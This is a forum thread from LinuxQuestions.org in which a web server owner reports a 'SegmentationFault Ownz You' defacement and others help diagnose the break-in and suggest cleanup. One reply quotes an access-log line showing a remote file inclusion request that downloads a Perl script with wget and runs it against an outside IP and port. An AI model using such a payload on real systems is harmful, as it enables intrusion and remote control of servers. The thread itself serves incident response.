SegmentationFault Ownz You id;uname -a ??? what is this?
Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
SegmentationFault Ownz You id;uname -a ??? what is this?
Hi all I have had a webserver up for about a year now and today I got up to somthing strange.... my desktop has no icons on it and I cant find any on the system at all all my files look like a document file including my folders. and my web page has reverted back to the setup page where it says
( Test Page )
This page is used to test the proper operation of the Apache Web server after it has been installed. If you can read this page, it means that the Apache Web server installed at this site is working properly.
I can access my web if I put admin.php at the of my webaddress but if I try to got to some links on my web I get this......
SegmentationFault Ownz You
id;uname -a
uid=0(root) gid=0(root) groups=48(apache),501(airsoft)
Linux localhost.localdomain 2.4.20-31.9 #1 Tue Apr 13 17:38:16 EDT 2004 i686 athlon i386 GNU/Linux
EOF
Distribution: Xubuntu 9.10, Gentoo 2.6.27 (AMD64), Darwin 9.0.0 (arm)
Posts: 1,152
Rep:
yes that looks like a note from someone going by the name SegmentationFault
id shows his user info (to show you he was root when he did this)
uname -a lists info about your system; but this was kind of dumb of him cause now you know exactly when he broke in and you may be able to check the logs and track him down.
Re: SegmentationFault Ownz You id;uname -a ??? what is this?
Quote:
Originally posted by mrfreeze Please dont tell me I was hacked......
Sorry, but it sounds very much like that's the case. You can download and run rkhunter or chkrootkit to be extra sure, but the defacement of your webpage looks similar to these: http://www.google.com/search?q=Segme...Fault+Ownz+You
You can also try looking through your logs, check the output of 'last' for abnormal logins, check /etc/passwd for abnormal entries, check for abnormal SUID/SGID files, and for odd files/dirs especially in /tmp. To be honest though it sounds very likely that you've been compromised, especially if you've been running old versions of PHP. So you'll need to do a full format and re-install from trusted media (not from a backup).
Moved: This thread is more suitable in our Linux-Security forum, and has been moved accordingly to help your thread/question get the exposure it deserves.
Would this be him here?
<SNIP>
/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.segfaultbr.hpgvip.com.br/tool25.gif?&cmd=cd%20/tmp/;wget%20www.neoit.com/cproject/dc.pl;perl%20dc.pl%20200.147.116.249%2022 HTTP/1.1" 200 8937 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Probably. Looks like they used this vuln. You can check /tmp for the dc.pl script that's downloaded and executed by the last request, but I wouldn't be surprised if it had been removed already.
And how do I fix this ... if you know how would make my life so much easyer thanks
You can avoid getting compromised in the first place by keeping your software updated. There have been a large number of PHP and PHP-related vulnerabilities recently, so you really need to be carefull and make sure you've applied all security patches. However, you will still need to format and re-install the system.
Last edited by Capt_Caveman; 05-26-2005 at 12:15 AM.
omg I just updated my php to 7.6 on the 22nd and I get hacked on the 25th... I just tracked this guy to Brazil and he say's
F--- America SegmentationFault Ownz You
Wth... he should take a look at his country's name.
omg I just updated my php to 7.6 on the 22nd and I get hacked on the 25th...
Do you have any other PHP-related BB software? Could you check the versions you had installed to be sure? FWIW, PHP is only at 5.0.4, so I'm assuming you mean PHP-Nuke.
I just tracked this guy to Brazil
I'd send a polite email to each of the ISPs involved describing what happed and include relevent log messages.
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.